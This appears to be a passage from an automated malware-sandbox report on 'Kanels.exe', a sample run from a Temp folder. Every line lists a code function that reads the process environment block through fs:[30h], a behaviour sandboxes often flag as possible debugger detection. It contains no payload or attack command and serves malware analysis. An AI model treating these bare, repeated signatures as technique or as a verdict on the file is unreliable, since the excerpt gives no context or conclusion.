Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_22D4E6F2
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4690 mov eax, dword ptr fs:[00000030h] 7_2_22CD4690
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD4690 mov eax, dword ptr fs:[00000030h] 7_2_22CD4690
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D066B0 mov eax, dword ptr fs:[00000030h] 7_2_22D066B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C6A6 mov eax, dword ptr fs:[00000030h] 7_2_22D0C6A6
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEC640 mov eax, dword ptr fs:[00000030h] 7_2_22CEC640
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D02674 mov eax, dword ptr fs:[00000030h] 7_2_22D02674
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A660 mov eax, dword ptr fs:[00000030h] 7_2_22D0A660
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A660 mov eax, dword ptr fs:[00000030h] 7_2_22D0A660
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9866E mov eax, dword ptr fs:[00000030h] 7_2_22D9866E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D9866E mov eax, dword ptr fs:[00000030h] 7_2_22D9866E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE260B mov eax, dword ptr fs:[00000030h] 7_2_22CE260B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12619 mov eax, dword ptr fs:[00000030h] 7_2_22D12619
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4E609 mov eax, dword ptr fs:[00000030h] 7_2_22D4E609
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD262C mov eax, dword ptr fs:[00000030h] 7_2_22CD262C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CEE627 mov eax, dword ptr fs:[00000030h] 7_2_22CEE627
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D06620 mov eax, dword ptr fs:[00000030h] 7_2_22D06620
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08620 mov eax, dword ptr fs:[00000030h] 7_2_22D08620
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDC7C0 mov eax, dword ptr fs:[00000030h] 7_2_22CDC7C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D507C3 mov eax, dword ptr fs:[00000030h] 7_2_22D507C3
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF27ED mov eax, dword ptr fs:[00000030h] 7_2_22CF27ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF27ED mov eax, dword ptr fs:[00000030h] 7_2_22CF27ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF27ED mov eax, dword ptr fs:[00000030h] 7_2_22CF27ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E7E1 mov eax, dword ptr fs:[00000030h] 7_2_22D5E7E1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD47FB mov eax, dword ptr fs:[00000030h] 7_2_22CD47FB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD47FB mov eax, dword ptr fs:[00000030h] 7_2_22CD47FB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7678E mov eax, dword ptr fs:[00000030h] 7_2_22D7678E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD07AF mov eax, dword ptr fs:[00000030h] 7_2_22CD07AF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D847A0 mov eax, dword ptr fs:[00000030h] 7_2_22D847A0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D54755 mov eax, dword ptr fs:[00000030h] 7_2_22D54755
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12750 mov eax, dword ptr fs:[00000030h] 7_2_22D12750
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12750 mov eax, dword ptr fs:[00000030h] 7_2_22D12750
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5E75D mov eax, dword ptr fs:[00000030h] 7_2_22D5E75D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0750 mov eax, dword ptr fs:[00000030h] 7_2_22CD0750
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0674D mov esi, dword ptr fs:[00000030h] 7_2_22D0674D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0674D mov eax, dword ptr fs:[00000030h] 7_2_22D0674D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0674D mov eax, dword ptr fs:[00000030h] 7_2_22D0674D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8770 mov eax, dword ptr fs:[00000030h] 7_2_22CD8770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0770 mov eax, dword ptr fs:[00000030h] 7_2_22CE0770
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D00710 mov eax, dword ptr fs:[00000030h] 7_2_22D00710
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C700 mov eax, dword ptr fs:[00000030h] 7_2_22D0C700
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0710 mov eax, dword ptr fs:[00000030h] 7_2_22CD0710
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4C730 mov eax, dword ptr fs:[00000030h] 7_2_22D4C730
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0273C mov eax, dword ptr fs:[00000030h] 7_2_22D0273C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0273C mov ecx, dword ptr fs:[00000030h] 7_2_22D0273C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0273C mov eax, dword ptr fs:[00000030h] 7_2_22D0273C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C720 mov eax, dword ptr fs:[00000030h] 7_2_22D0C720
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C720 mov eax, dword ptr fs:[00000030h] 7_2_22D0C720
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD04E5 mov ecx, dword ptr fs:[00000030h] 7_2_22CD04E5
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A49A mov eax, dword ptr fs:[00000030h] 7_2_22D8A49A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D044B0 mov ecx, dword ptr fs:[00000030h] 7_2_22D044B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5A4B0 mov eax, dword ptr fs:[00000030h] 7_2_22D5A4B0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD64AB mov eax, dword ptr fs:[00000030h] 7_2_22CD64AB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D8A456 mov eax, dword ptr fs:[00000030h] 7_2_22D8A456
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CC645D mov eax, dword ptr fs:[00000030h] 7_2_22CC645D
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E443 mov eax, dword ptr fs:[00000030h] 7_2_22D0E443
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF245A mov eax, dword ptr fs:[00000030h] 7_2_22CF245A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5C460 mov ecx, dword ptr fs:[00000030h] 7_2_22D5C460
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFA470 mov eax, dword ptr fs:[00000030h] 7_2_22CFA470
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFA470 mov eax, dword ptr fs:[00000030h] 7_2_22CFA470
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFA470 mov eax, dword ptr fs:[00000030h] 7_2_22CFA470
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08402 mov eax, dword ptr fs:[00000030h] 7_2_22D08402
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08402 mov eax, dword ptr fs:[00000030h] 7_2_22D08402
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08402 mov eax, dword ptr fs:[00000030h] 7_2_22D08402
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCC427 mov eax, dword ptr fs:[00000030h] 7_2_22CCC427
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE420 mov eax, dword ptr fs:[00000030h] 7_2_22CCE420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE420 mov eax, dword ptr fs:[00000030h] 7_2_22CCE420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CCE420 mov eax, dword ptr fs:[00000030h] 7_2_22CCE420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D56420 mov eax, dword ptr fs:[00000030h] 7_2_22D56420
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A5D0 mov eax, dword ptr fs:[00000030h] 7_2_22D0A5D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0A5D0 mov eax, dword ptr fs:[00000030h] 7_2_22D0A5D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD65D0 mov eax, dword ptr fs:[00000030h] 7_2_22CD65D0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E5CF mov eax, dword ptr fs:[00000030h] 7_2_22D0E5CF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E5CF mov eax, dword ptr fs:[00000030h] 7_2_22D0E5CF
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE5E7 mov eax, dword ptr fs:[00000030h] 7_2_22CFE5E7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD25E0 mov eax, dword ptr fs:[00000030h] 7_2_22CD25E0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C5ED mov eax, dword ptr fs:[00000030h] 7_2_22D0C5ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0C5ED mov eax, dword ptr fs:[00000030h] 7_2_22D0C5ED
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0E59C mov eax, dword ptr fs:[00000030h] 7_2_22D0E59C
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2582 mov eax, dword ptr fs:[00000030h] 7_2_22CD2582
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD2582 mov ecx, dword ptr fs:[00000030h] 7_2_22CD2582
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D04588 mov eax, dword ptr fs:[00000030h] 7_2_22D04588
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D505A7 mov eax, dword ptr fs:[00000030h] 7_2_22D505A7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D505A7 mov eax, dword ptr fs:[00000030h] 7_2_22D505A7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D505A7 mov eax, dword ptr fs:[00000030h] 7_2_22D505A7
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF45B1 mov eax, dword ptr fs:[00000030h] 7_2_22CF45B1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF45B1 mov eax, dword ptr fs:[00000030h] 7_2_22CF45B1
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8550 mov eax, dword ptr fs:[00000030h] 7_2_22CD8550
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8550 mov eax, dword ptr fs:[00000030h] 7_2_22CD8550
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0656A mov eax, dword ptr fs:[00000030h] 7_2_22D0656A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0656A mov eax, dword ptr fs:[00000030h] 7_2_22D0656A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0656A mov eax, dword ptr fs:[00000030h] 7_2_22D0656A
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D66500 mov eax, dword ptr fs:[00000030h] 7_2_22D66500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4500 mov eax, dword ptr fs:[00000030h] 7_2_22DA4500
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE53E mov eax, dword ptr fs:[00000030h] 7_2_22CFE53E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE53E mov eax, dword ptr fs:[00000030h] 7_2_22CFE53E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE53E mov eax, dword ptr fs:[00000030h] 7_2_22CFE53E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE53E mov eax, dword ptr fs:[00000030h] 7_2_22CFE53E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFE53E mov eax, dword ptr fs:[00000030h] 7_2_22CFE53E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0535 mov eax, dword ptr fs:[00000030h] 7_2_22CE0535
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D04AD0 mov eax, dword ptr fs:[00000030h] 7_2_22D04AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D04AD0 mov eax, dword ptr fs:[00000030h] 7_2_22D04AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0AD0 mov eax, dword ptr fs:[00000030h] 7_2_22CD0AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D26ACC mov eax, dword ptr fs:[00000030h] 7_2_22D26ACC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D26ACC mov eax, dword ptr fs:[00000030h] 7_2_22D26ACC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D26ACC mov eax, dword ptr fs:[00000030h] 7_2_22D26ACC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0AAEE mov eax, dword ptr fs:[00000030h] 7_2_22D0AAEE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0AAEE mov eax, dword ptr fs:[00000030h] 7_2_22D0AAEE
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D08A90 mov edx, dword ptr fs:[00000030h] 7_2_22D08A90
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CDEA80 mov eax, dword ptr fs:[00000030h] 7_2_22CDEA80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22DA4A80 mov eax, dword ptr fs:[00000030h] 7_2_22DA4A80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8AA0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8AA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8AA0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8AA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D26AA4 mov eax, dword ptr fs:[00000030h] 7_2_22D26AA4
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0A5B mov eax, dword ptr fs:[00000030h] 7_2_22CE0A5B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CE0A5B mov eax, dword ptr fs:[00000030h] 7_2_22CE0A5B
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD6A50 mov eax, dword ptr fs:[00000030h] 7_2_22CD6A50
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4CA72 mov eax, dword ptr fs:[00000030h] 7_2_22D4CA72
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D4CA72 mov eax, dword ptr fs:[00000030h] 7_2_22D4CA72
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7EA60 mov eax, dword ptr fs:[00000030h] 7_2_22D7EA60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0CA6F mov eax, dword ptr fs:[00000030h] 7_2_22D0CA6F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0CA6F mov eax, dword ptr fs:[00000030h] 7_2_22D0CA6F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0CA6F mov eax, dword ptr fs:[00000030h] 7_2_22D0CA6F
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5CA11 mov eax, dword ptr fs:[00000030h] 7_2_22D5CA11
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEA2E mov eax, dword ptr fs:[00000030h] 7_2_22CFEA2E
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D0CA24 mov eax, dword ptr fs:[00000030h] 7_2_22D0CA24
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF4A35 mov eax, dword ptr fs:[00000030h] 7_2_22CF4A35
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF4A35 mov eax, dword ptr fs:[00000030h] 7_2_22CF4A35
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0BCD mov eax, dword ptr fs:[00000030h] 7_2_22CD0BCD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0BCD mov eax, dword ptr fs:[00000030h] 7_2_22CD0BCD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD0BCD mov eax, dword ptr fs:[00000030h] 7_2_22CD0BCD
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF0BCB mov eax, dword ptr fs:[00000030h] 7_2_22CF0BCB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF0BCB mov eax, dword ptr fs:[00000030h] 7_2_22CF0BCB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CF0BCB mov eax, dword ptr fs:[00000030h] 7_2_22CF0BCB
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D7EBD0 mov eax, dword ptr fs:[00000030h] 7_2_22D7EBD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D5CBF0 mov eax, dword ptr fs:[00000030h] 7_2_22D5CBF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CFEBFC mov eax, dword ptr fs:[00000030h] 7_2_22CFEBFC
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22CD8BF0 mov eax, dword ptr fs:[00000030h] 7_2_22CD8BF0
